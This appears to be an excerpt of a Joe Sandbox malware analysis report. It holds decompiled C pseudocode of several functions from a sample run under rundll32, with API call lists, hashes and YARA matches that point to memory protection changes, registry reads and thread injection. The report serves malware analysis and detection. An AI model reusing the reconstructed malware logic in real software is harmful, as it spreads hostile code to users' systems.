                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                            • String ID: !]t
                            • API String ID: 3664505660-1252899741
                            • Opcode ID: 5ea95172ef231ba288ac85b84413bd4233bc6754362393251a2cd0aa65b5df6a
                            • Instruction ID: 476510ebbdd1590b5adcccff467a1eb833ccef15946bb374fed3fc61103c3680
                            • Opcode Fuzzy Hash: 5ea95172ef231ba288ac85b84413bd4233bc6754362393251a2cd0aa65b5df6a
                            • Instruction Fuzzy Hash: 5B316C79D00119AFDF22AFA5DD849EEFFB9EB48710F104026F951BA120D2751A82DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A13D2C Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 57%
                            			E04A13D2C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04A13CFD();
				if(_t21 != 0) {
					_t59 =  *0x4a1a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4a1a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4a1a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04A1389E( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4a1a348; // 0xb1d5a8
					if( *0x4a1a2fc > 5) {
						_t8 = _t26 + 0x4a1b5c5; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4a1b9fd; // 0x44283a44
						_t27 = _t7;
					}
					E04A16B80(_t27, _t27);
					_t31 = E04A176BB(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x4a1a310 =  *0x4a1a310 ^ 0x81bbe65d;
						_t32 = E04A16D63(0x60);
						 *0x4a1a3cc = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4a1a3cc; // 0x55395b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4a1a3cc; // 0x55395b0
							 *_t51 = 0x4a1b827;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4a1a2d8, 0, 0x43);
							 *0x4a1a368 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4a1a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4a1a348; // 0xb1d5a8
								_t13 = _t58 + 0x4a1b552; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4a19287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04A13365( ~_v8 &  *0x4a1a310, 0x4a1a00c); // executed
								_t42 = E04A11645(0, _t55, _t63, 0x4a1a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04A13981(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04A1661D(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04A1529C(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4a1a17c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04A17928(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                            0x04a13d2c
                            0x04a13d36
                            0x04a13d39
                            0x04a13d3c
                            0x04a13d3f
                            0x04a13d46
                            0x04a13d48
                            0x04a13d54
                            0x04a13d56
                            0x04a13d56
                            0x04a13d5f
                            0x04a13d65
                            0x04a13d6a
                            0x04a13d84
                            0x04a13d90
                            0x04a13d92
                            0x04a13d97
                            0x04a13da1
                            0x04a13da1
                            0x04a13d99
                            0x04a13d99
                            0x04a13d99
                            0x04a13d99
                            0x04a13da8
                            0x04a13db5
                            0x04a13dbc
                            0x04a13dc1
                            0x04a13dc1
                            0x04a13dca
                            0x04a13dcd
                            0x04a13df3
                            0x04a13dff
                            0x04a13e04
                            0x04a13e09
                            0x04a13e0b
                            0x04a13e37
                            0x04a13e39
                            0x04a13e0d
                            0x04a13e11
                            0x04a13e16
                            0x04a13e1b
                            0x04a13e22
                            0x04a13e28
                            0x04a13e2d
                            0x04a13e33
                            0x04a13e3a
                            0x04a13e3c
                            0x04a13e3e
                            0x04a13e4d
                            0x04a13e53
                            0x04a13e58
                            0x04a13e5a
                            0x04a13e8a
                            0x04a13e8c
                            0x04a13e5c
                            0x04a13e5c
                            0x04a13e62
                            0x04a13e6f
                            0x04a13e75
                            0x04a13e75
                            0x04a13e7d
                            0x04a13e86
                            0x04a13e8d
                            0x04a13e8f
                            0x04a13e91
                            0x04a13e98
                            0x04a13ea5
                            0x04a13eaa
                            0x04a13eaf
                            0x04a13eb1
                            0x04a13eb3
                            0x00000000
                            0x00000000
                            0x04a13eb5
                            0x04a13eba
                            0x04a13ebc
                            0x04a13ec3
                            0x04a13ec7
                            0x04a13eca
                            0x04a13edf
                            0x04a13ee3
                            0x04a13ee8
                            0x00000000
                            0x04a13ee8
                            0x04a13ecc
                            0x04a13ece
                            0x00000000
                            0x00000000
                            0x04a13ed9
                            0x04a13edb
                            0x04a13edd
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a13edd
                            0x04a13ec0
                            0x04a13ec0
                            0x04a13e91
                            0x04a13dcf
                            0x04a13dcf
                            0x04a13dd4
                            0x04a13eea
                            0x04a13eef
                            0x04a13ef7
                            0x04a13ef7
                            0x00000000
                            0x04a13eef
                            0x04a13dda
                            0x04a13ddd
                            0x04a13de7
                            0x04a13dee
                            0x00000000
                            0x04a13eff
                            0x04a13eff
                            0x04a13f02
                            0x04a13f06
                            0x04a13f06

                            APIs
                              • Part of subcall function 04A13CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,04A13D44,00000001), ref: 04A13D0C
                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04A13DC1
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • memset.NTDLL ref: 04A13E11
                            • RtlInitializeCriticalSection.NTDLL(05539570), ref: 04A13E22
                              • Part of subcall function 04A1529C: memset.NTDLL ref: 04A152B6
                              • Part of subcall function 04A1529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04A152FC
                              • Part of subcall function 04A1529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04A15307
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04A13E4D
                            • wsprintfA.USER32 ref: 04A13E7D
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                            • String ID:
                            • API String ID: 4246211962-0
                            • Opcode ID: 6e9e185440a620a404668ad7eb13f0a8c1563f06bd5b075d2314621d270fa44a
                            • Instruction ID: a55ac6ca517e7a68993423865e026fc4e27692f90f821fe85311ed53f8d0acaa
                            • Opcode Fuzzy Hash: 6e9e185440a620a404668ad7eb13f0a8c1563f06bd5b075d2314621d270fa44a
                            • Instruction Fuzzy Hash: 3451A171B01324ABFF11AFA4DC94BAE77B8EB14714F044869E902DB1B0E775B9458B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A119E2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E04A119E2(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04A16D63(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04A16C2C(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04A16D63((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4a1a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                            0x04a119e9
                            0x04a119f0
                            0x04a119f5
                            0x04a119f8
                            0x04a119ff
                            0x04a11a02
                            0x04a11a05
                            0x04a11a0a
                            0x04a11a0f
                            0x04a11b63
                            0x04a11b65
                            0x04a11b67
                            0x04a11b6c
                            0x04a11b6c
                            0x04a11a15
                            0x04a11a18
                            0x04a11a1b
                            0x04a11a1d
                            0x04a11a1d
                            0x04a11a21
                            0x00000000
                            0x00000000
                            0x04a11a25
                            0x04a11a51
                            0x04a11a56
                            0x04a11a58
                            0x04a11a58
                            0x04a11a5b
                            0x04a11a5e
                            0x04a11a5e
                            0x04a11a60
                            0x00000000
                            0x04a11a2b
                            0x04a11a2d
                            0x04a11a4c
                            0x04a11a4c
                            0x04a11a63
                            0x04a11a63
                            0x04a11a64
                            0x04a11a64
                            0x04a11a67
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a11a67
                            0x04a11a31
                            0x04a11a78
                            0x04a11a7c
                            0x04a11b56
                            0x04a11b58
                            0x04a11b58
                            0x04a11b59
                            0x04a11b5c
                            0x00000000
                            0x04a11b5c
                            0x04a11a85
                            0x04a11a96
                            0x04a11a9a
                            0x04a11b52
                            0x00000000
                            0x04a11b52
                            0x04a11aa0
                            0x04a11aa3
                            0x04a11aa7
                            0x04a11aab
                            0x04a11ab0
                            0x04a11b48
                            0x04a11b48
                            0x00000000
                            0x04a11b4e
                            0x04a11abb
                            0x04a11ac4
                            0x04a11ad8
                            0x04a11adf
                            0x04a11af4
                            0x04a11afa
                            0x04a11b02
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a11b04
                            0x04a11b04
                            0x04a11b04
                            0x04a11b0b
                            0x04a11b13
                            0x00000000
                            0x00000000
                            0x04a11b15
                            0x04a11b1e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a11b20
                            0x04a11b22
                            0x04a11b25
                            0x04a11b25
                            0x04a11b28
                            0x04a11b2c
                            0x04a11b2f
                            0x04a11b35
                            0x04a11b38
                            0x04a11b3f
                            0x00000000
                            0x04a11abb
                            0x04a11a36
                            0x04a11a3e
                            0x04a11a44
                            0x04a11a46
                            0x04a11a46
                            0x04a11a49
                            0x04a11a4b
                            0x00000000
                            0x04a11a4b
                            0x04a11a25
                            0x04a11a6b
                            0x04a11a70
                            0x04a11a72
                            0x04a11a72
                            0x04a11a75
                            0x04a11a75
                            0x00000000

                            APIs
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04A11ADF
                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 04A11AF4
                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04A11B0B
                            • lstrlen.KERNEL32(69B25F45), ref: 04A11B2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: 71cf21bde9759798f922464eafb1e71d673469b536ac3ed5df355fb5012fcb0d
                            • Instruction ID: 61547c5a2dee9d85ad7de3078cc0bee8692b2b5b6439949eb159f6fdc13d4e21
                            • Opcode Fuzzy Hash: 71cf21bde9759798f922464eafb1e71d673469b536ac3ed5df355fb5012fcb0d
                            • Instruction Fuzzy Hash: 1A51B331A04108EFDF21CF99C584AEDBBBAFF59314F49815AE9559B221D770BA41CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1498E Relevance: 7.6, APIs: 5, Instructions: 96synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A1498E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x4a1a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4a1a348; // 0xb1d5a8
				_t3 = _t8 + 0x4a1b87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E04A111C3(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4a1a34c, 1, 0, _t30);
					E04A16C2C(_t30);
				}
				_t12 =  *0x4a1a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E04A1402A(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E04A168BD(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E04A17928(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								FindCloseChangeNotification(_t25); // executed
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

















                            0x04a1498f
                            0x04a14996
                            0x04a149a0
                            0x04a149a4
                            0x04a149aa
                            0x04a149b9
                            0x04a149c0
                            0x04a149c4
                            0x04a149d6
                            0x04a149d8
                            0x04a149d8
                            0x04a149dd
                            0x04a149e4
                            0x04a14a3b
                            0x04a14a3b
                            0x04a14a41
                            0x04a14a43
                            0x04a14a43
                            0x04a14a48
                            0x04a14a4d
                            0x04a14a51
                            0x04a14a63
                            0x04a14a63
                            0x04a14a67
                            0x04a14a6d
                            0x04a14a6d
                            0x00000000
                            0x04a149f4
                            0x04a149f4
                            0x04a149fb
                            0x00000000
                            0x00000000
                            0x04a14a02
                            0x04a14a0a
                            0x04a14a0e
                            0x04a14a12
                            0x04a14a12
                            0x04a14a1a
                            0x04a14a1f
                            0x04a14a23
                            0x04a14a27
                            0x04a14a7c
                            0x04a14a82
                            0x04a14a82
                            0x04a14a35
                            0x04a14a39
                            0x04a14a70
                            0x04a14a72
                            0x04a14a75
                            0x04a14a75
                            0x00000000
                            0x04a14a72
                            0x04a14a39
                            0x00000000
                            0x04a14a23

                            APIs
                              • Part of subcall function 04A111C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05539D70,00000000,?,?,69B25F44,00000005,04A1A00C,4D283A53,?,?), ref: 04A111F9
                              • Part of subcall function 04A111C3: lstrcpy.KERNEL32(00000000,00000000), ref: 04A1121D
                              • Part of subcall function 04A111C3: lstrcat.KERNEL32(00000000,00000000), ref: 04A11225
                            • CreateEventA.KERNEL32(04A1A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A149CF
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • StrChrW.SHLWAPI(04A17187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A14A02
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,04A17187,00000000,00000000,?,00000000,?,04A17187,?,?,?), ref: 04A14A2F
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A14A5D
                            • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A14A75
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 3294472205-0
                            • Opcode ID: 3965c892bb9b75387a0c8597b2c2a591ca9f2e932a51dd13c94a392862c41284
                            • Instruction ID: 92e0e35337e7d73917b26aeed9f37eba548f2f8fb7d1bc9ae8e348f2a824800e
                            • Opcode Fuzzy Hash: 3965c892bb9b75387a0c8597b2c2a591ca9f2e932a51dd13c94a392862c41284
                            • Instruction Fuzzy Hash: 1C2137726013106BE7319F6C9C44B6B72ADEF8CB11B460626FD81EB130DB35EC02C688
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F81ECA Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F7B7A4: RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                              • Part of subcall function 04F7B7A4: lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F4C
                            • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                            • String ID:
                            • API String ID: 1633053242-0
                            • Opcode ID: 34cd454c9af6d06927fbbe706de45b4e328e0117418bb6fc852eb8ce729128bf
                            • Instruction ID: 8fa5242373cdb9c006746fa393f6447996145985ff841d783006c5c86f99ec22
                            • Opcode Fuzzy Hash: 34cd454c9af6d06927fbbe706de45b4e328e0117418bb6fc852eb8ce729128bf
                            • Instruction Fuzzy Hash: 991149B250014DBFDF01AF94ED84CFE7B7EEB88254B10052AFA05DB110E775AE56AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7212C Relevance: 7.5, APIs: 5, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(?,?,?,?,?,04F6111D,00000000), ref: 04F7214D
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F72166
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04F6111D,00000000), ref: 04F72183
                            • IsWow64Process.KERNEL32(?,?,?,?,?,?,04F6111D,00000000), ref: 04F72194
                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,04F6111D,00000000), ref: 04F721A7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                            • String ID:
                            • API String ID: 1712524627-0
                            • Opcode ID: afd889708a370748772c5c9d8ca5f98249a34093085eb39e18bac22c5d2eb70f
                            • Instruction ID: 8d8f582f79388841b335bc53a930676476bbba8992f05c057016777cb80eb7da
                            • Opcode Fuzzy Hash: afd889708a370748772c5c9d8ca5f98249a34093085eb39e18bac22c5d2eb70f
                            • Instruction Fuzzy Hash: D9015E71D00608FFCB11DF95F848CA97BB8FB85791711416BEA059B200E7785A02CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F633A5 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 04F633CA
                            • GetLastError.KERNEL32(?,00000000), ref: 04F633D2
                            • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 04F633E9
                            • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 04F6340E
                            • SetLastError.KERNEL32(80000000,?,00000000), ref: 04F63417
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$ErrorLastProtect$Query
                            • String ID:
                            • API String ID: 148356745-0
                            • Opcode ID: 53f473df65e61759c56da2f8ef4a66bafb71c2420d28650b0e5d470ded7dde9d
                            • Instruction ID: 6ea9cd6832b0b05c4212989b7f652bd2d6c05bb07beb94f006b5980196cc1c31
                            • Opcode Fuzzy Hash: 53f473df65e61759c56da2f8ef4a66bafb71c2420d28650b0e5d470ded7dde9d
                            • Instruction Fuzzy Hash: FE01297250020DBFDF129F95EC448AEBBB9EF08258700802AFD02D6210D771E9159BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7ED07 Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F7ED35
                            • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04F7EDBF
                            • WaitForSingleObject.KERNEL32(00000064), ref: 04F7EDCD
                            • SuspendThread.KERNEL32(?), ref: 04F7EDE0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                            • String ID:
                            • API String ID: 3168247402-0
                            • Opcode ID: 55a096e6361c3144923e68e9eebe2369928ae35adac92cad332191d806c0d40a
                            • Instruction ID: e4add9059fdb282e0a26ba9543e42f48f9985b3e8182dc2d009b85b00d654a1f
                            • Opcode Fuzzy Hash: 55a096e6361c3144923e68e9eebe2369928ae35adac92cad332191d806c0d40a
                            • Instruction Fuzzy Hash: 60415872508301AFE721DF64CC80D6BBBEAFB88714F04492FFA9486160D776E915CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A174FE Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 04A1755B
                            • SysAllocString.OLEAUT32(04A13520), ref: 04A1759F
                            • SysFreeString.OLEAUT32(00000000), ref: 04A175B3
                            • SysFreeString.OLEAUT32(00000000), ref: 04A175C1
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
